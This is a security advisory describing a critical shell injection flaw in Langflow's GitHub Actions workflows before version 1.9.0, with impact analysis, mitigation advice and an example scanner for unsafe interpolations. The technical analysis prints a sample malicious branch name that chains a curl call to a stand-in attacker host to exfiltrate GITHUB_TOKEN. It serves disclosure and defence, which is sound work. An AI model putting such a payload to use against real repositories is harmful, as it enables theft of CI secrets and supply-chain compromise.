
CVE-2026-33475: CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') in langflow-ai langflow

Critical
Type: Vulnerability; CVE-2026-33475; tags: cve, cve-2026-33475, cwe-74, cwe-78
Published: Tue Mar 24 2026 (03/24/2026, 12:54:33 UTC)
Source: CVE Database V5
Vendor/Project: langflow-ai
Product: langflow

Description

CVE-2026-33475 is a critical unauthenticated remote shell injection vulnerability in langflow versions prior to 1.9.0. It arises from improper sanitization of user-controlled GitHub context variables interpolated directly into shell commands within GitHub Actions workflows. Attackers can exploit this by creating malicious branch names or pull request titles that inject arbitrary shell commands during CI/CD execution. This leads to exfiltration of sensitive secrets such as GITHUB_TOKEN, unauthorized infrastructure manipulation, and potential supply chain compromise. The vulnerability affects multiple workflow files and actions in the Langflow repository. The issue is patched in version 1.9.0 by using environment variables and proper quoting to prevent injection.

AI-Powered Analysis

Machine-generated threat intelligence

Last updated: 03/24/2026, 13:15:56 UTC

Technical Analysis

Langflow, a tool for building AI-powered agents and workflows, contains a critical shell injection vulnerability (CVE-2026-33475) in its GitHub Actions workflows prior to version 1.9.0. The root cause is the unsanitized interpolation of GitHub context variables such as `${{ github.head_ref }}` and `${{ github.event.pull_request.title }}` directly into `run:` steps in workflow YAML files. Since these variables can be controlled by an attacker via branch names or pull request titles, they serve as vectors for injecting arbitrary shell commands. For example, a malicious branch name like `injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN` causes the injected command to execute during CI runs, leaking sensitive secrets such as the `GITHUB_TOKEN`. This token grants broad permissions within the repository, enabling attackers to push malicious code, manipulate releases, or compromise the supply chain. The affected files include multiple workflows and actions such as `deploy-docs-draft.yml`, `docker-build.yml`, and `install-playwright/action.yml`. The vulnerability requires no authentication or user interaction, making it highly exploitable in public forks with GitHub Actions enabled. The fix implemented in version 1.9.0 involves refactoring workflows to assign user-controlled values to environment variables and wrapping them in double quotes to prevent shell injection. Direct interpolation inside `run:` steps is avoided to ensure proper sanitization. This vulnerability is classified under CWE-74 and CWE-78, highlighting improper neutralization of special elements and command injection risks. Although no known exploits are reported in the wild yet, the critical CVSS score of 9.1 underscores the urgency of patching.

Potential Impact

The impact of CVE-2026-33475 is severe for organizations using Langflow with GitHub Actions enabled, especially public repositories or forks. Exploitation allows unauthenticated attackers to execute arbitrary shell commands within the CI environment, leading to full compromise of CI secrets such as `GITHUB_TOKEN`. This token can be used to push malicious code, tamper with releases, inject backdoors, or exfiltrate sensitive infrastructure data. The vulnerability effectively grants attackers remote code execution capabilities in the CI/CD pipeline, undermining the integrity and confidentiality of the software supply chain. Organizations relying on Langflow for AI workflows risk supply chain attacks, unauthorized deployments, and leakage of proprietary or sensitive information. The ease of exploitation without authentication or user interaction increases the likelihood of automated attacks. The scope includes any public fork or repository using vulnerable Langflow versions with GitHub Actions enabled, potentially affecting open source contributors and organizations integrating Langflow into their pipelines. This can lead to reputational damage, operational disruption, and compliance violations if exploited.

Mitigation Recommendations

To mitigate this vulnerability, organizations should immediately upgrade Langflow to version 1.9.0 or later where the issue is patched. For existing workflows, refactor all GitHub Actions workflows and custom actions to avoid direct interpolation of user-controlled GitHub context variables inside `run:` shell commands. Instead, assign these variables to environment variables and wrap them in double quotes to ensure proper shell escaping. For example, use `env: BRANCH_NAME: ${{ github.head_ref }}` and reference `$BRANCH_NAME` inside the script with quotes. Additionally, restrict repository permissions and secrets exposure in GitHub Actions by applying the principle of least privilege to tokens like `GITHUB_TOKEN`. Consider enabling branch protection rules and limiting who can create pull requests or branches that trigger workflows. Monitor CI logs for suspicious command executions and audit workflow files regularly for unsafe interpolations. Employ automated scanning tools to detect injection risks in CI/CD configurations. Finally, educate developers and DevOps teams about secure GitHub Actions practices to prevent similar injection flaws.
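The audit step recommended above can be automated. The following is an added example, not code from Langflow or from this advisory: a small scanner that flags user-controlled GitHub context expressions expanded inside `run:` scripts while accepting the patched pattern that passes them through `env:`. The function name, the two sample workflows (constructed) and the contexts beyond the two named in the advisory are assumptions.

```python
import re

# Contexts a PR author controls. The first two are named in the advisory;
# the issue/comment fields are assumptions added here for broader coverage.
UNTRUSTED = re.compile(
    r"\$\{\{\s*(github\.head_ref"
    r"|github\.event\.pull_request\.(?:title|body|head\.ref)"
    r"|github\.event\.(?:issue|comment)\.(?:title|body))\s*\}\}"
)
# Group 1 is everything before the key, so its length is the key's column.
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")

def find_unsafe_run_interpolations(workflow_text):
    """Return (line_no, expression) for untrusted contexts inside run: scripts."""
    findings, run_col = [], None
    for no, line in enumerate(workflow_text.splitlines(), 1):
        m = RUN_KEY.match(line)
        indent = len(line) - len(line.lstrip())
        if m:                                   # start of a run: step
            run_col, body = len(m.group(1)), m.group(2)
        elif run_col is not None and (not line.strip() or indent > run_col):
            body = line                         # continuation of the script
        else:                                   # sibling key such as env:
            run_col, body = None, ""
        findings += [(no, e.group(1)) for e in UNTRUSTED.finditer(body)]
    return findings

# Constructed sample: the unsafe pattern described in the advisory.
VULNERABLE = """\
jobs:
  build:
    steps:
      - name: Show branch
        run: |
          echo "Building ${{ github.head_ref }}"
"""

# Constructed sample: the patched pattern (env: assignment, quoted use).
PATCHED = """\
jobs:
  build:
    steps:
      - name: Show branch
        env:
          BRANCH_NAME: ${{ github.head_ref }}
        run: |
          echo "Building $BRANCH_NAME"
"""
```

The scan is line-based and does not parse YAML, so it covers block and inline `run:` scripts but not anchors or unusual flow syntax.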


Technical Details

Data Version: 5.2
Assigner Short Name: GitHub_M
Date Reserved: 2026-03-20T16:16:48.969Z
Cvss Version: 3.1
State: PUBLISHED

Threat ID: 69c28b09f4197a8e3b35a4bc

Added to database: 3/24/2026, 1:00:57 PM

Last enriched: 3/24/2026, 1:15:56 PM

Last updated: 3/24/2026, 2:05:23 PM
